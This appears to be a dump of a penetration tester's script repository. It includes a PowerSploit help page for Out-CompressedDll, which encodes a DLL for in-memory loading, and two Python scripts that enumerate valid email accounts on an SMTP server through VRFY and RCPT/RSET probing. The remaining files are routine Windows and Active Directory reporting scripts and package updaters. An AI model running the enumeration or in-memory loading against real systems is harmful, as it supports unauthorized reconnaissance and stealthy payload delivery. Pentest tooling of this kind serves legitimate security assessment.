Base-64 encodes, and outputs generated code to load a managed dll in memory. 5 | 6 | PowerSploit Function: Out-CompressedDll 7 | Author: Matthew Graeber (@mattifestation) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | Optional Dependencies: None 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Out-CompressedDll [-FilePath] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Out-CompressedDll -FilePath evil.dll 26 | ``` 27 | 28 | Description 29 | ----------- 30 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory. 31 | 32 | ## PARAMETERS 33 | 34 | ### -FilePath 35 | Specifies the path to a managed executable. 36 | 37 | ```yaml 38 | Type: String 39 | Parameter Sets: (All) 40 | Aliases: 41 | 42 | Required: True 43 | Position: 1 44 | Default value: None 45 | Accept pipeline input: False 46 | Accept wildcard characters: False 47 | ``` 48 | 49 | ## INPUTS 50 | 51 | ## OUTPUTS 52 | 53 | ## NOTES 54 | Only pure MSIL-based dlls can be loaded using this technique. 55 | Native or IJW ('it just works' - mixed-mode) dlls will not load. 56 | 57 | ## RELATED LINKS 58 | 59 | [http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html](http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html) 60 | 61 | -------------------------------------------------------------------------------- /powershell/adwcleaner.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | Run AdwCleaner scan. 4 | .DESCRIPTION 5 | Downloads the current version of AdwCleaner and executes a . 6 | .PARAMETER workingDir 7 | The working directory where the AdwCleaner.exe will be downloaded and run. 8 | .EXAMPLE 9 | .\adwcleaner.ps1 -workingDir "C:\custom\path\" 10 | .AUTHOR 11 | Matthew C. Jones, CPA, CISA, OSCP, CCFE 12 | Symphona, LLP 13 | .CHANGELOG 14 | 1/9/2023 - Initial release. 15 | #> 16 | 17 | param( 18 | [string]$workingDir = "C:\temp\" 19 | ) 20 | 21 | $downloadUrl = "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" 22 | $savePath = "$workingDir\AdwCleaner.exe" 23 | $logPath = "$workingDir\Adwcleaner\Logs" 24 | $quarantinePath = "$workingDir\Adwcleaner\Quarantine" 25 | $switches = "/eula /clean /noreboot /path $workingDir" 26 | 27 | # Create the directory if it doesn't exist 28 | $null = New-Item -ItemType Directory -Force -Path (Split-Path -Parent $savePath) 29 | 30 | # Download the file 31 | Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath 32 | 33 | # Store the start time of the script 34 | $startTime = Get-Date 35 | 36 | # Run the file 37 | Start-Process -FilePath $savePath -ArgumentList $switches -Verb RunAs -Wait 38 | 39 | # Get all files in the logs directory that have been modified since the start time of the script 40 | $logFiles = Get-ChildItem -Path $logPath | Where-Object { $_.LastWriteTime -gt $startTime } | Sort-Object LastWriteTime 41 | 42 | # Read the contents of the files into the $content variable 43 | $content = $logFiles | ForEach-Object { 44 | "`n$($_.FullName)`n" 45 | Get-Content -LiteralPath $_.FullName 46 | } 47 | 48 | # Output the content to the CLI 49 | Write-Output $content -------------------------------------------------------------------------------- /powershell/export_AD_groups.ps1: -------------------------------------------------------------------------------- 1 | #Designed to export information in same format as DumpSec 2 | 3 | $reportdate = Get-Date -Format ssddmmyyyy 4 | 5 | #$csvreportfile = "ALLADGroups_$reportdate.csv" 6 | $csvreportfile = "AD_group_membership.csv" 7 | 8 | #import the ActiveDirectory Module 9 | Import-Module ActiveDirectory 10 | 11 | $ADGroups = Get-ADGroup -Filter '*' -Properties '*'| Where {$_.GroupCategory -eq "Security"} | Sort-Object SamAccountName 12 | $Results = ForEach ($AdGroup in $ADGroups) 13 | { 14 | $Members = Get-AdGroupMember -Identity $AdGroup.SamAccountName -Recursive | Where {$_.ObjectClass -ne "computer"} 15 | ForEach ($Member in $Members) 16 | { 17 | $Hash = @{ 18 | Group = $AdGroup.SamAccountName 19 | Description = $AdGroup.Description 20 | GroupType = $AdGroup.GroupScope 21 | Member = $Member.SamAccountName 22 | MemberType = $Member.objectClass 23 | } 24 | New-Object -TypeName PSObject -Property $Hash 25 | } 26 | } 27 | 28 | $Results | Select Group,Description,GroupType,Member,MemberType | Export-Csv -Path $csvreportfile -NoTypeInformation -------------------------------------------------------------------------------- /powershell/export_all_GPO_reports.ps1: -------------------------------------------------------------------------------- 1 | #Exports all group policy objects as individual GPO reports 2 | 3 | Import-Module GroupPolicy 4 | Get-GPO -all | % { Get-GPOReport -GUID $_.id -ReportType HTML -Path "GPO_$($_.displayName).html" } 5 | Get-GPOReport -All -ReportType html -Path GPO_all.html 6 | Get-GPOReport -All -ReportType xml -Path GPO_all.xml -------------------------------------------------------------------------------- /powershell/gpresult.ps1: -------------------------------------------------------------------------------- 1 | Import-Module -Name grouppolicy 2 | 3 | function get_more 4 | { 5 | $title = "Add more" 6 | $message = "Add GPResult command for alternate computer / user?" 7 | 8 | $yes = New-Object System.Management.Automation.Host.ChoiceDescription "&Yes", ` 9 | "Adds another." 10 | 11 | $no = New-Object System.Management.Automation.Host.ChoiceDescription "&No", ` 12 | "Runs the commands." 13 | 14 | $options = [System.Management.Automation.Host.ChoiceDescription[]]($yes, $no) 15 | 16 | $result = $host.ui.PromptForChoice($title, $message, $options, 1) 17 | 18 | switch ($result) 19 | { 20 | 0 {return "TRUE"} 21 | } 22 | } 23 | 24 | function get_params 25 | { 26 | $return = "" | Select-Object -Property run_name,target_computer,user_name 27 | 28 | #$return.run_name = Read-Host -Prompt 'Enter the name to be assigned for the run (e.g. DomainController, MemberServer, etc):' 29 | $return.target_computer = Read-Host -Prompt "Enter the machine name / IP to analyze: " 30 | $return.user_name = Read-Host -Prompt "Enter the user context to analyze (must have profile on target machine): " 31 | return $return 32 | 33 | } 34 | 35 | $params=@() 36 | 37 | "Running GPResult on the current machine using the current user" 38 | $path = "gpresult_" + $env:computername 39 | 40 | Get-GPResultantSetOfPolicy -ReportType html -Path $path 41 | 42 | While (get_more) 43 | { 44 | $params += get_params 45 | } 46 | 47 | ForEach ($command in $params) 48 | { 49 | #$path = 'gpresult_'+$command.run_name + '.html' 50 | $path = 'gpresult_'+$command.target_computer + '.html' 51 | "Running GPResult on "+$command.target_computer+" as "+ $command.user_name 52 | Get-GPResultantSetOfPolicy -ReportType html -Path $path -Computer $command.target_computer -User $command.user_name 53 | } 54 | -------------------------------------------------------------------------------- /smtp_rst.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | 6 | if len(sys.argv) != 4: 7 | print "Enumerates email accounts by initiating an email and resetting before being sent \r\n" 8 | print "Usage:smtp_rst ,outputfile.txt>" 9 | sys.exit(0) 10 | 11 | # Define input variables 12 | server=sys.argv[1] 13 | userfile=sys.argv[2] 14 | outputfile=sys.argv[3] 15 | 16 | #Create a socket 17 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | 19 | # Connect to the server 20 | connect=s.connect((server,25)) 21 | 22 | # Recieve the banner 23 | banner=s.recv(1024) 24 | print banner 25 | 26 | # Open output file for writing 27 | out=open(outputfile, "a") 28 | out.write('Output ' + server + ': \r') 29 | 30 | # VRFY users in input file 31 | f=open(userfile) 32 | line=f.readline() 33 | print "Beginning check... \n" 34 | while line: 35 | line=line.strip() 36 | print 'Checking for user ' + line 37 | s.send('EHLO testuser') 38 | s.send('MAIL FROM: testuser@nomail.com \r\n') 39 | result=s.recv(1024) 40 | print result 41 | s.send('RCPT TO: ' + line + '\r\n') 42 | result=s.recv(1024) 43 | print result 44 | 45 | if result.startswith('250'): 46 | out.write(result + '\r') 47 | s.send ('RSET') 48 | result="" 49 | line=f.readline() 50 | 51 | # Cleanup 52 | s.send ('QUIT \r\n') 53 | s.close() 54 | f.close() 55 | out.close() -------------------------------------------------------------------------------- /smtp_vrfy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | 6 | if len(sys.argv) != 4: 7 | print "Usage:smtp_vrfy ,outputfile.txt>" 8 | sys.exit(0) 9 | 10 | # Define input variables 11 | server=sys.argv[1] 12 | userfile=sys.argv[2] 13 | outputfile=sys.argv[3] 14 | 15 | #Create a socket 16 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | 18 | # Connect to the server 19 | connect=s.connect((server,25)) 20 | 21 | # Recieve the banner 22 | banner=s.recv(1024) 23 | print banner 24 | 25 | # Open output file for writing 26 | out=open(outputfile, "a") 27 | out.write('Active email accounts on server ' + server + ': \r') 28 | 29 | # VRFY users in input file 30 | f=open(userfile) 31 | line=f.readline() 32 | print "Beginning check... \n" 33 | while line: 34 | line=line.strip() 35 | print 'Checking for user ' + line 36 | s.send('VRFY ' + line + '\r\n') 37 | result=s.recv(1024) 38 | print result 39 | 40 | if result.startswith('250'): 41 | out.write(result + '\r') 42 | result="" 43 | line=f.readline() 44 | 45 | # Cleanup 46 | s.close() 47 | f.close() 48 | out.close() 49 | 50 | -------------------------------------------------------------------------------- /update_docker_images.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Updates all docker images on filesystem and deletes old images 3 | 4 | #docker images | grep -v REPOSITORY | awk '{print $1}' | xargs -L1 docker pull 5 | docker images --format "{{.Repository}}:{{.Tag}}" | xargs -L1 docker pull 6 | docker image prune -f -------------------------------------------------------------------------------- /update_git_repos.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Update all git repositories under a base directory 3 | # script courtesy of https://gist.github.com/douglas/1287372 4 | 5 | # store the current dir 6 | CUR_DIR="$(pwd)" 7 | 8 | # Let the person running the script know what's going on. 9 | echo -e "\n\033[1mPulling in latest changes for all repositories...\033[0m\n" 10 | 11 | # Find all git repositories and update it to the master latest revision 12 | for i in $(find . -name ".git" | cut -c 3-); do 13 | echo ""; 14 | echo -e "\033[33m"+$i+"\033[0m"; 15 | 16 | # We have to go to the .git parent directory to call the pull command 17 | cd "$i"; 18 | cd ..; 19 | 20 | # finally pull 21 | git pull origin master; 22 | 23 | # lets get back to the CUR_DIR 24 | cd $CUR_DIR 25 | done 26 | 27 | echo -e "\n\033[32mComplete!\033[0m\n" -------------------------------------------------------------------------------- /upgrade_pip_packages.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | pip2 freeze --local | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip2 install -U 4 | pip3 freeze --local | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip3 install -U --------------------------------------------------------------------------------